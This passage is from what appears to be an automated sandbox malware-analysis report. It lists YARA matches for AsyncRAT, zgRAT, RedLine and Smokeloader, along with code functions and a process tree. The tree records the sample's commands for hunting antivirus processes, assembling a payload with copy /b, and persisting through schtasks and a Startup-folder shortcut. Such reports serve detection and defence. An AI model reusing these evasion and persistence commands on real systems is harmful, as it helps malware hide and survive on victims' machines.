                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005E9CE519_2_005E9CE5
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005CDD2819_2_005CDD28
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005DBFD619_2_005DBFD6
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_005D1FC019_2_005D1FC0
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CA8C8F24_2_00CA8C8F
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00C9662024_2_00C96620
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00C998E024_2_00C998E0
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CAA88C24_2_00CAA88C
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00C9588024_2_00C95880
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CC605224_2_00CC6052
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CC81F124_2_00CC81F1
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CAB9AC24_2_00CAB9AC
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00C9CAF024_2_00C9CAF0
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CB0B0024_2_00CB0B00
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CB7CC024_2_00CB7CC0
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CA4C6024_2_00CA4C60
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CB641B24_2_00CB641B
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CBF42E24_2_00CBF42E
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CAC66024_2_00CAC660
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CC1E7924_2_00CC1E79
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CCA61124_2_00CCA611
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00C9478024_2_00C94780
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: 24_2_00CCA73124_2_00CCA731
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_00748C8F27_2_00748C8F
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0073662027_2_00736620
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0076605227_2_00766052
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_007398E027_2_007398E0
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0073588027_2_00735880
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0074A88C27_2_0074A88C
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_007681F127_2_007681F1
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0074B9AC27_2_0074B9AC
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0073CAF027_2_0073CAF0
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_00750B0027_2_00750B00
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_00744C6027_2_00744C60
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0075F42E27_2_0075F42E
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0075641B27_2_0075641B
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_00757CC027_2_00757CC0
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_00761E7927_2_00761E79
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0074C66027_2_0074C660
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0074AE2C27_2_0074AE2C
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0076A61127_2_0076A611
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0076A73127_2_0076A731
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: 27_2_0073478027_2_00734780
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0040B21931_2_0040B219
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0042505431_2_00425054
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0044B17B31_2_0044B17B
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0044C24031_2_0044C240
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0044B29B31_2_0044B29B
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_004466F031_2_004466F0
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0042784331_2_00427843
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0042486531_2_00424865
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0043B8A331_2_0043B8A3
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_0044AA2931_2_0044AA29
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_00404AF031_2_00404AF0
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_00429BE531_2_00429BE5
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_00446B8831_2_00446B88
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_00404C7031_2_00404C70
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_00404E7031_2_00404E70
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B152BB31_2_02B152BB
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B3B3E231_2_02B3B3E2
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02AF50D731_2_02AF50D7
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B3C4A731_2_02B3C4A7
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B3B50231_2_02B3B502
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B17AAA31_2_02B17AAA
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B14ACC31_2_02B14ACC
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B2BB0A31_2_02B2BB0A
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B3695731_2_02B36957
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02AF4ED731_2_02AF4ED7
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B19E4C31_2_02B19E4C
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02B3AC9031_2_02B3AC90
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: 31_2_02AF4D5731_2_02AF4D57
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe AB0CA1D93238D0EFC02A41A7B311EFE3FC07C042F22D0608D33EA5313A667E55
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe 6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe 3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Security
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: String function: 005D8B30 appears 42 times
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: String function: 005D0D17 appears 70 times
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: String function: 005C1A36 appears 34 times
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeCode function: String function: 007507C0 appears 54 times
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeCode function: String function: 00CB07C0 appears 54 times
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: String function: 02B0BCB7 appears 133 times
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: String function: 02B115F9 appears 68 times
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: String function: 00421392 appears 69 times
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: String function: 02B11C37 appears 38 times
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: String function: 004219D0 appears 39 times
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeCode function: String function: 0041BA50 appears 128 times
                        Source: channel2.exe.11.drStatic PE information: Number of sections : 18 > 10
                        Source: Channel1[1].exe.11.drStatic PE information: Number of sections : 18 > 10
                        Source: channel2[1].exe.11.drStatic PE information: Number of sections : 18 > 10
                        Source: 3546345.exe.11.drStatic PE information: Number of sections : 18 > 10
                        Source: meta[1].exe.11.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
                        Source: meta.exe.11.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
                        Source: wfJfUGeGT3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 0000001F.00000002.4168709454.0000000002A0F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPEDMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\Windows.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: GOLD[1].exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: GOLD.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: crypteda[1].exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: crypteda.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: build2[1].exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: build2.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: meta[1].exe.11.drStatic PE information: Section: .rsrc ZLIB complexity 0.9984809027777778
                        Source: meta.exe.11.drStatic PE information: Section: .rsrc ZLIB complexity 0.9984809027777778
                        Source: random[1].exe.11.drStatic PE information: Section: ZLIB complexity 0.9974135728882834
                        Source: random[1].exe.11.drStatic PE information: Section: prspuaeb ZLIB complexity 0.9943780728545888
                        Source: 36f677264b.exe.11.drStatic PE information: Section: ZLIB complexity 0.9974135728882834
                        Source: 36f677264b.exe.11.drStatic PE information: Section: prspuaeb ZLIB complexity 0.9943780728545888
                        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@95/66@0/13
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061A6AD GetLastError,FormatMessageW,19_2_0061A6AD
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00608DE9 AdjustTokenPrivileges,CloseHandle,19_2_00608DE9
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00609399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,19_2_00609399
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,19_2_0061B976
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_00614148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,19_2_00614148
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061C9DA CoInitialize,CoCreateInstance,CoUninitialize,19_2_0061C9DA
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrCode function: 19_2_0061443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,19_2_0061443D
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifFile created: C:\Users\user\AppData\Local\TrackGuard TechnologiesJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeMutant created: \Sessions\1\BaseNamedObjects\Global\349587345342
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMutant created: \Sessions\1\BaseNamedObjects\QGOn8xsapkNWVjl5
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeMutant created: \Sessions\1\BaseNamedObjects\1623b75a3df63053c0bc46185e9e5487
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_03
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile created: C:\Users\user\AppData\Local\Temp\nsgC9EA.tmpJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
                        Source: wfJfUGeGT3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: wfJfUGeGT3.exeReversingLabs: Detection: 13%
                        Source: wfJfUGeGT3.exeVirustotal: Detection: 13%
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeFile read: C:\Users\user\Desktop\wfJfUGeGT3.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\wfJfUGeGT3.exe "C:\Users\user\Desktop\wfJfUGeGT3.exe"
                        Source: C:\Users\user\Desktop\wfJfUGeGT3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe"
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeProcess created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe"
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifProcess created: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe "C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe"
